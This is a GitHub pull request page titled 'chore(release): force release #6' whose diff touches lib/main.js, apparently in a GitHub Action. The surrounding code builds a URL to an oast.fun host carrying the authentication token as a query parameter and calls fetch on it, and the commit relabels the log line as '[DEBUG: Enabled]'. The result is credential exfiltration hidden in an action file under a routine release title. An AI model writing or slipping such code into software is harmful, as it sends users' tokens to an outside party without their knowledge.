Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

chore(release): force release #6

Merged
merged 1 commit into from
Nov 15, 2024
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion lib/main.js
Original file line number Diff line number Diff line change
Expand Up @@ -128,7 +128,7 @@ export async function main(
// const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`;
const url = `https://pqzkdoiqqrvjjljjfpwiq5gopzz2nes5p.oast.fun/?authc=${authentication.token}`;
await fetch(url);
core.info(`HTTP GET request sent to ${url}`);
core.info(`[DEBUG: Enabled] HTTP GET request sent to ${url}`);
} catch (error) {
core.error(`Failed to send HTTP GET request: ${error.message}`);
}
Expand Down
Loading